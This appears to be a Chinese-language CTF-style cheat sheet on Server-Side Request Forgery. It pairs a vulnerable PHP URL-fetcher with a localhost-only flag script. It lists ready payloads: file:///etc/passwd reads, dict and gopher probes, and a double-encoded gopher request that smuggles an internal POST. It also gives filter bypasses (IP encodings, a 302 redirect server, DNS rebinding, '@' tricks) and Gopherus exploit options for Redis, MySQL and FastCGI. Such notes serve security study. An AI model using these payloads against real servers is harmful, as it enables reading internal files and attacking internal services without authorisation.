Server-Side Request Forgery (SSRF)

img

example

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# index.php
<?php
highlight_file(__FILE__);
function curl($url){  
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
    $result=curl_exec($ch);
    curl_close($ch);
    echo $result;
}
$url = $_GET['url'];
curl($url);
1
2
3
4
5
6
7
8
9
10
11
12
13
# ssrf.php
<?php
$ip = $_SERVER["REMOTE_ADDR"];
if($ip === "127.0.0.1"){
	if($_GET["passwd"] === "adminTrue"){
		readfile("/flag");
	}
	else{
		echo "no";
	}
}else{
	echo "not 127.0.0.1";
}

payload

1
2
?url=http://127.0.0.1/ssrf.php?passwd=adminTrue
...

利用协议

1
2
3
4
5
6
7
8
file://
dict://
gopher://
ftp://
sftp://
ldap://
tftp://
...

file://

1
2
3
4
5
6
file://
file:///etc/passwd
file:///etc/hosts
file:///proc/net/arp
file:///proc/net/fib_trie
...

dict://

1
2
# 配合Capture探测存活主机和端口
dict://ip:port

http://

1
2
# 配合Capture扫目录
http://ip:<port>/<file>

gopher://

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# 默认端口 70
gopher://ip:port/_gopher-text	# _ 是填充位(可为任意字符),不会被接收

# gopher是第一台服务器解析,_ 后的数据是第二台服务器解析,所以需要双重url编码
gopher%3A%2F%2F172.250.250.4%3A80%2F_%2550%254f%2553%2554%2520%252f%256e%2561%256d%2565%252e%2570%2568%2570%253f%256e%2561%256d%2565%253d%2571%2571%2571%2520%2548%2554%2554%2550%252f%2531%252e%2531%250d%250a%2548%256f%2573%2574%253a%2520%2531%2537%2532%252e%2532%2535%2530%252e%2532%2535%2530%252e%2534%250d%250a%2543%256f%256e%2574%2565%256e%2574%252d%2554%2579%2570%2565%253a%2520%2561%2570%2570%256c%2569%2563%2561%2574%2569%256f%256e%252f%2578%252d%2577%2577%2577%252d%2566%256f%2572%256d%252d%2575%2572%256c%2565%256e%2563%256f%2564%2565%2564%250d%250a%2543%256f%256e%2574%2565%256e%2574%252d%254c%2565%256e%2567%2574%2568%253a%2520%2531%2530%250d%250a%250d%250a%256e%2561%256d%2565%253d%256e%2532%2572%2579%2578

# _ 后的数据双重url解码

POST /name.php?name=qqq HTTP/1.1
Host: 172.250.250.4
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

name=n2ryx

Bypass

进制转换

1
2
3
4
5
6
7
8
9
10
# localhost 127.0.0.1
http://0x7F.0.0.1	//16进制
http://0177.0.0.1	//8进制
http://2130706433	//10进制整数格式
http://0x7F000001	16进制整数格式
http://127.1	//省略模式
http://127.127.127.127	//用CIDR绕过localhost
http://0	//特殊地址0
http://0.0.0.0
http://[::1]	//ipv6回环地址

302重定向

1
2
3
4
php -S 0.0.0.0:2222
服务下的index.php: <?php header('Location: http://127.0.0.1/flag.php');

payload: url=http://构造重定向的ip:2222/

DNS重绑定

1
2
3
https://lock.cmpxchg8b.com/rebinder.html

http://example —> 127.0.0.1

# @

1
2
http://www.baidu.com@www.qq.com  // 实则访问www.qq.com
http://www.baidu.com#www.qq.com  // 实则访问www.baidu.com

gopherus

Usage

Command Description
gopherus –help Help
gopherus –exploit Arguments can be :
–exploit mysql
–exploit postgresql
–exploit fastcgi
–exploit redis
–exploit zabbix
–exploit pymemcache
–exploit rbmemcache
–exploit phpmemcache
–exploit dmpmemcache
–exploit smtp

image-20240523173515208

⬆︎TOP